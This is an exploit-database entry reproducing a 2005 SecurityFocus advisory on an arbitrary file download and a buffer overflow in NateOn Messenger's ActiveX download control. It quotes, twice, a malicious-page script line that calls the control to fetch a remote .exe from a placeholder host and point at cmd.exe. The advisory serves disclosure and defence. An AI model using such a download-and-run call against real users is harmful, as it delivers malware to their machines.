header-logo
Suggest Exploit
vendor:
NateOn Messenger
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Download and Buffer Overflow
20
CWE
Product Name: NateOn Messenger
Affected Version From: NateOn Messenger 1.0
Affected Version To: NateOn Messenger 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

NateOn Messenger Arbitrary File Download and Buffer Overflow Vulnerabilities

NateOn Messenger is susceptible to an arbitrary file download vulnerability, and a buffer overflow vulnerability. These issues are present in the 'NateonDownloadManager.ocx' ActiveX control that is installed with the application. An attacker would exploit these issues by creating malicious HTML containing script code that accesses the vulnerable ActiveX controls. This issue allows remote attackers to fetch arbitrary remote files and save them on the local machine. The buffer overflow vulnerability allows remote attackers to execute arbitrary machine code in the context of the user running the affected software, facilitating remote system compromise. Attackers may utilize these vulnerabilities in conjunction with each other in order to transfer malicious code to targeted users, and then execute it. To exploit the arbitrary file download vulnerability, a malicious Web page may include the following script code: GotNate.Excute('1','http://www.example.com/somefile.exe','c:windowssystem32cmd.exe');

Mitigation:

Users should avoid visiting untrusted websites and should not click on links provided by unknown or untrusted sources. Additionally, users should never accept or execute files from untrusted or unknown sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14974/info

NateOn Messenger is susceptible to an arbitrary file download vulnerability, and a buffer overflow vulnerability. These issues are present in the 'NateonDownloadManager.ocx' ActiveX control that is installed with the application.

An attacker would exploit these issues by creating malicious HTML containing script code that accesses the vulnerable ActiveX controls. This issue allows remote attackers to fetch arbitrary remote files and save them on the local machine.

The buffer overflow vulnerability allows remote attackers to execute arbitrary machine code in the context of the user running the affected software, facilitating remote system compromise.

Attackers may utilize these vulnerabilities in conjunction with each other in order to transfer malicious code to targeted users, and then execute it. 

To exploit the arbitrary file download vulnerability, a malicious Web page may include the following script code:

GotNate.Excute("1",'http://www.example.com/somefile.exe','c:\\windows\\system32\\cmd.exe');